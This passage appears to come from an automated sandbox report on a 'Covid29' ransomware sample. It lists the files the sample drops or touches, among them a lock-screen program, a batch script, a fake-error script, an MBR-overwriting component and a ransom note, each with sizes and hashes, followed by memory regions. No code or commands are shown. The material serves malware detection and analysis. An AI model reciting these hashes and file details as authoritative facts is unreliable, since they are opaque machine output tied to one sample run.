                                                                                      428e23237f24dbed8e29f7124e58149d41083334

                                                                                      SHA256

                                                                                      46a29850ee3b696ae7a3b91e2625d70267229581e1b05a48080e7171a5ffa6f2

                                                                                      SHA512

                                                                                      c3cad47ee588a8f3a56e7d9c10fcb8c6dad1dc67c9ab9988fe063f322e8bbd7d6b43ffe15a2696e16b82a476e0d277aaeee0f2abc40fad80bacdfb9f3c503945

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      cef593e9eb620bbe844b34609118ac0f

                                                                                      SHA1

                                                                                      26764efb4f322ad3a0cf5968ddb19c4fdf49e02b

                                                                                      SHA256

                                                                                      817c9a25601c590069e3b21bc02f9572a79f7eeef9d331514f289996e85f5ac5

                                                                                      SHA512

                                                                                      b9f93eb5cccb172d9ebfcb90d1b68cbe1a508600c2f9936adafd6351f194774656ee1aca2246a75303373593ac4d819fd5e105a883b34baa31658127664256bf

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      0cfb190e23cc507550d49bbab33136e1

                                                                                      SHA1

                                                                                      58183b2e4ba04a22ee5ed676334d80149f272017

                                                                                      SHA256

                                                                                      155fc36119013bfb94d143be809b0494660d14751c5b46d37deed9d86cf59fe2

                                                                                      SHA512

                                                                                      ac31a7301a4c3dc132fc9dfb6447067b787b536bf3567fb2fb8276b37818ece86e248b2afb0b0c7b0d71f73c5c3492bfd69be289c9ba33d1e12a56ee278f7d5f

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58973a.TMP

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      97e9b728783d7851c03c9252b0af0868

                                                                                      SHA1

                                                                                      2913352abae97a78cedd4ad25d7937f4bef3cc48

                                                                                      SHA256

                                                                                      621448ec9cbad9bb14aa11f21cd25aa2387b98e1e1441a6ecd71b9485e47b16f

                                                                                      SHA512

                                                                                      127ff066d59e72dd9c8591b9316eda5173ee8627d4c23b0fddd37c041bc22e88df09ce3c09cbaad2566f87d807cff1b295ab81221c2928b9feb6c4f1280730b6

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                      Filesize

                                                                                      16B

                                                                                      MD5

                                                                                      206702161f94c5cd39fadd03f4014d98

                                                                                      SHA1

                                                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                      SHA256

                                                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                      SHA512

                                                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                      Filesize

                                                                                      16B

                                                                                      MD5

                                                                                      46295cac801e5d4857d09837238a6394

                                                                                      SHA1

                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                      SHA256

                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                      SHA512

                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                      Filesize

                                                                                      11KB

                                                                                      MD5

                                                                                      83bcbcb5c8486730c943cfa7f9bfe669

                                                                                      SHA1

                                                                                      7a0abdab12d27db98ed5763087609af4104d2cac

                                                                                      SHA256

                                                                                      cce155ff56cd8412188fccacf24dca6573f58e3a878781953e14ff98b6f4652e

                                                                                      SHA512

                                                                                      f0bf82b2ff420d1e7388a4313058ce6bc489f01a410d918e6111a1f30c77d305f9a74765bd8e8815f393080601f586e282609499c947099261861303e224de2e

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      07be400b8fc6ddd3b1e6f4c828ffe2eb

                                                                                      SHA1

                                                                                      f3cc47e97e03c494790b97ce9345221a5306afe6

                                                                                      SHA256

                                                                                      926791552ba81d87be5e1c883746f666011ac4951d06064348f108a021346997

                                                                                      SHA512

                                                                                      9b7707f5faa5a8d200217efddbe3d8cfa27ca1e1dc1e85655363ed977cba7508678ef485328f1c7face0499a1a752b4fc4393eeef368f9c445a81382f5b46934

                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                      Filesize

                                                                                      264KB

                                                                                      MD5

                                                                                      1c82fd85da0c0c0c85bcc6c454c4043d

                                                                                      SHA1

                                                                                      b470276cb0ccb538c77051c43d21c77cc12ff2ac

                                                                                      SHA256

                                                                                      ef466c5fc82bb8d91febb1eae5594b0b52e30f90af62b58be6e7af080e796abb

                                                                                      SHA512

                                                                                      9c49a643be4e447ca3a0003dccf823abe4b00926cbab420b7f2d285d5d143a2eb0b07bc3336190fff22707230f333fb265b074683911f885ee76d3882e19f4c9

                                                                                    • C:\Users\Admin\AppData\Local\Temp\3733.tmp\Cov29Cry.exe.death

                                                                                      Filesize

                                                                                      103KB

                                                                                      MD5

                                                                                      8bcd083e16af6c15e14520d5a0bd7e6a

                                                                                      SHA1

                                                                                      c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                                                      SHA256

                                                                                      b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                                                      SHA512

                                                                                      35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                                                    • C:\Users\Admin\AppData\Local\Temp\3733.tmp\Cov29LockScreen.exe

                                                                                      Filesize

                                                                                      48KB

                                                                                      MD5

                                                                                      f724c6da46dc54e6737db821f9b62d77

                                                                                      SHA1

                                                                                      e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                                                      SHA256

                                                                                      6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                                                      SHA512

                                                                                      6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                                                    • C:\Users\Admin\AppData\Local\Temp\3733.tmp\TrojanRansomCovid29.bat

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      57f0432c8e31d4ff4da7962db27ef4e8

                                                                                      SHA1

                                                                                      d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                                                      SHA256

                                                                                      b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                                                      SHA512

                                                                                      bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                                                    • C:\Users\Admin\AppData\Local\Temp\3733.tmp\fakeerror.vbs

                                                                                      Filesize

                                                                                      144B

                                                                                      MD5

                                                                                      c0437fe3a53e181c5e904f2d13431718

                                                                                      SHA1

                                                                                      44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                                                      SHA256

                                                                                      f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                                                      SHA512

                                                                                      a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                                                    • C:\Users\Admin\AppData\Local\Temp\3733.tmp\mbr.exe.danger

                                                                                      Filesize

                                                                                      1.3MB

                                                                                      MD5

                                                                                      35af6068d91ba1cc6ce21b461f242f94

                                                                                      SHA1

                                                                                      cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                                                      SHA256

                                                                                      9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                                                      SHA512

                                                                                      136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                                                                                      Filesize

                                                                                      10KB

                                                                                      MD5

                                                                                      d60a6ce086b09ea5d8ee515be7ec175f

                                                                                      SHA1

                                                                                      942460fc2f9869cc74da5c59a9430a4da494ed22

                                                                                      SHA256

                                                                                      986f66560bed45c840f24e557423d0d366db127dba00586b7bde5d8c7d904136

                                                                                      SHA512

                                                                                      76d89447f38432aabd9982e2488fe739b73a1ecd43f8b8179164c471075e64f502161896f049fbbcc7f75d6b3a0b73be53aac945791d7e5c9335e16a55d9fcd5

                                                                                    • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                                                      Filesize

                                                                                      861B

                                                                                      MD5

                                                                                      c53dee51c26d1d759667c25918d3ed10

                                                                                      SHA1

                                                                                      da194c2de15b232811ba9d43a46194d9729507f0

                                                                                      SHA256

                                                                                      dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                                                      SHA512

                                                                                      da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                                                    • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                                                                      Filesize

                                                                                      1.7MB

                                                                                      MD5

                                                                                      272d3e458250acd2ea839eb24b427ce5

                                                                                      SHA1

                                                                                      fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                                                      SHA256

                                                                                      bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                                                      SHA512

                                                                                      d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                                                    • C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe

                                                                                      Filesize

                                                                                      542KB

                                                                                      MD5

                                                                                      9f0563f2faaf6b9a0f7b3cf058ac80b6

                                                                                      SHA1

                                                                                      244e0ff0a5366c1607f104e7e7af4949510226ec

                                                                                      SHA256

                                                                                      a8054338891db7231f9885ca0d3bc90a651c63878ff603ede5c3efafa7e25254

                                                                                      SHA512

                                                                                      40cdf4c754977e60c233417e42a62be02f9b5bfe239c0378664c28757ce6ce1fc3b91b83d6ef6bb184c4d831761f57a07255526d12a3a955c3b473bddb97f4c9

                                                                                    • C:\Users\Admin\Downloads\Covid29 Ransomware\source\Cov29Cry\bg.jpg

                                                                                      Filesize

                                                                                      30KB

                                                                                      MD5

                                                                                      108fc794e7171419cf881b4058f88d20

                                                                                      SHA1

                                                                                      dd05defd9fe5fb103db09eb2a3bb72c5ed7d8777

                                                                                      SHA256

                                                                                      741d2576009640a47733a6c724d56ed1a9cee1014cde047b9384181a1758cd34

                                                                                      SHA512

                                                                                      3a1a22217ff636e48612ff3b55ac6611eda6ae0b5a1f4d693440cbd6aef84d6657d3cd076ca828ba828ee556ab64e5bdecb37c1d682590877f3b23345baeb0ea

                                                                                    • C:\Users\Admin\Downloads\Covid29 Ransomware\source\mbr.cpp

                                                                                      Filesize

                                                                                      365B

                                                                                      MD5

                                                                                      d20eddecb5625b60d61d80c067537188

                                                                                      SHA1

                                                                                      8418cb3dd155a9399e7be92da3b4fcd50b559f99

                                                                                      SHA256

                                                                                      45eaa30a90c739fd9fb32d59b29d3e7cd8871431670a3e64d6c34fd53a08f979

                                                                                      SHA512

                                                                                      a0f1578adbabaa0cd5567678ac382637ea078070ef7f567251374ff7f1d1e3e2c6d108471a0cd6aeeb47058d06e0c2bafd0e8f487be04208e44311e478c1f980

                                                                                    • memory/216-552-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/216-492-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/216-555-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/440-953-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                      Filesize

                                                                                      864KB

                                                                                    • memory/624-1068-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/624-897-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/1524-525-0x0000000000E50000-0x0000000000E70000-memory.dmp

                                                                                      Filesize

                                                                                      128KB

                                                                                    • memory/1844-926-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/1844-1071-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/1844-1074-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/3672-854-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/3672-1063-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/3920-1059-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                      Filesize

                                                                                      864KB

                                                                                    • memory/4640-524-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                      Filesize

                                                                                      864KB

                                                                                    • memory/4800-886-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                      Filesize

                                                                                      864KB

                                                                                    • memory/4924-970-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                      Filesize

                                                                                      864KB

                                                                                    • memory/5036-1079-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB